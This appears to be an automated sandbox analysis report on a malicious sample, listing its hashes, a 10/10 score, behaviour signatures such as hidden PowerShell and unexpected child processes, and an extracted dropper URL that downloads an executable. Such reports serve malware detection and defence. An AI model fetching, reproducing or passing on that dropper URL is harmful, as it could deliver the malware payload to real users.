General

  • Target

    5e40ff4f7d71c5d7f15f3658f7f0f3e8_JaffaCakes118

  • Size

    128KB

  • Sample

    240720-acxtcsxbnn

  • MD5

    5e40ff4f7d71c5d7f15f3658f7f0f3e8

  • SHA1

    dc0283bad8ea311041775a709f328099faa5ae91

  • SHA256

    caf470ee82450f8c4735002e31f671acf1b6ee335658ef96117f2970645e0f40

  • SHA512

    d037af5ce9126edfa99050b118636f9366cec5e334c78fde0f6ce88f976771fd288c1af3f53fedec44095b6dafe13ce146eb7ce53c5504365c4ec5b4bde98427

  • SSDEEP

    1536:IHnYdmIa+w84pvAQUcTKB+KRUWie6Moq1QLhSr+gMY:IqmImpvXKwzWEsSLwrXMY

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://fast-cargo.com/PAYMENT_details.exe

Targets

    • Target

      5e40ff4f7d71c5d7f15f3658f7f0f3e8_JaffaCakes118

    • Size

      128KB

    • MD5

      5e40ff4f7d71c5d7f15f3658f7f0f3e8

    • SHA1

      dc0283bad8ea311041775a709f328099faa5ae91

    • SHA256

      caf470ee82450f8c4735002e31f671acf1b6ee335658ef96117f2970645e0f40

    • SHA512

      d037af5ce9126edfa99050b118636f9366cec5e334c78fde0f6ce88f976771fd288c1af3f53fedec44095b6dafe13ce146eb7ce53c5504365c4ec5b4bde98427

    • SSDEEP

      1536:IHnYdmIa+w84pvAQUcTKB+KRUWie6Moq1QLhSr+gMY:IqmImpvXKwzWEsSLwrXMY

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

MITRE ATT&CK Enterprise v15

Tasks